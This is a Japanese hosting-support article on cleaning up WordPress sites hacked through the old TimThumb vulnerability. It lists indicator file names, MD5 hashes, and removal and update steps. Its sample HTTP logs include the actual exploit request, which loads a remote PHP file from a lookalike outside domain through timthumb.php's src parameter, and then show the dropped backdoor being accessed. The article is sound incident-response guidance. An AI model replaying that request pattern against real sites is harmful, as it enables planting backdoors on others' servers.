WordPressの不正アクセス:TimThumb

TimThumbは、WordPressテーマとプラグインが画像をリサイズするために使用するツールです。以前のバージョンのTimThumbにはセキュリティの脆弱性があり、攻撃者は他のWebサイトから悪意のあるファイルをアップロードできます。攻撃者は最初の悪意のあるファイルを利用して、他の悪意のあるファイルをホスティングアカウントにアップロードします。

不正アクセスについての詳細と対処法については、Webサイトがハッキングされたらどうすればいいですか?を参照してください。

不正アクセスの兆候

Webサイトがハッキングされたらどうすればいいですか?で言及した兆候以外にも、アカウントのpluginディレクトリに次のようなパターンを持つファイルがあれば、サイトがこの種類の不正アクセスの影響を受けていることが分かります。

  • external_[md5 hash].php — 例: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — 例:7eebe45bde5168488ac4010f0d65cea8.php

md5ハッシュの例は、この記事の既知の悪意のあるファイルのMD5SUMセクションをご覧ください。

Webサイトのルートディレクトリには、次のようなファイルもあるかもしれません(詳細)。

  • x.txt
  • logx.txt

救済措置

不正アクセスされたファイルと感染したファイルをすべて取り除く必要があります。何かを削除する前に、Webサイトのバックアップを取ることをお勧めします(詳細)。

感染したファイルを突き止める

TimThumbの脆弱性を突いて最初にアップロードされる感染したファイルは大抵、TimThumbの脆弱なファイルを含む/themeまたは/pluginディレクトリ内の、次のディレクトリのいずれかにあります。

  • /tmp
  • /cache
  • /images

感染したファイルの場所の例:

[webルート]/wp-content/themes/[脆弱なTimThumbを含むテーマ]/cache/images/

これらの場所にある感染したファイル名の例:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

ファイルx.txtlogx.txtには、感染したファイルがTimThumbの脆弱性を利用していつ作成されたかについての情報と、ホスティングアカウント内の感染したファイルの場所についての情報が含まれています。この情報は、どのファイルを削除すべきか、どこにあるかを判断するうえで役立ちます。とはいえ、このファイルから削除すべきファイルをすべて知ることはできないでしょう。

例:

Day :Thu, 11 Apr 2013 06:21:15 -0700
IP:X.X.X.X
Browser:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

削除するファイル

サイトのバックアップを作成したら、次のファイルを削除します。

  • x.txt
  • logx.txt
  • external_[md5 hash].php — 例: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — 例:7eebe45bde5168488ac4010f0d65cea8.php
  • md5ハッシュが名前に含まれる、他の悪意のあるPHPファイル。

この操作は、FTP(詳細)またはホスティングアカウントのコントロールパネル内のファイルマネージャ(詳細)から実行できます。

次も実行する必要があります。

  • すべてのテーマとプラグインを最新バージョンに更新する。
  • TimThumb.phpのすべてのインスタンスを、ここにある最新バージョンに置き換える。

技術情報

HTTPログのサンプル

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[脆弱性のあるTimThumbを含むテーマ]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[脆弱性のあるTimThumbを含むテーマ]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[脆弱性のあるTimThumbを含むテーマ]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[脆弱性のあるTimThumbを含むテーマ]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

既知の悪意のあるファイルのMD5SUM

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

他の悪意のあるファイル

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

この記事は役に立ちましたか。
フィードバックへのご協力ありがとうございました。 お客様サービススタッフとお話しになりたい場合は、上記のサポート用電話番号またはチャット機能をご利用ください。
お役にたてて光栄です! 何か他にできることはありませんか。
それはすみません。 わかりにくい点や、解決策で問題が解決できなかった理由等を教えてください。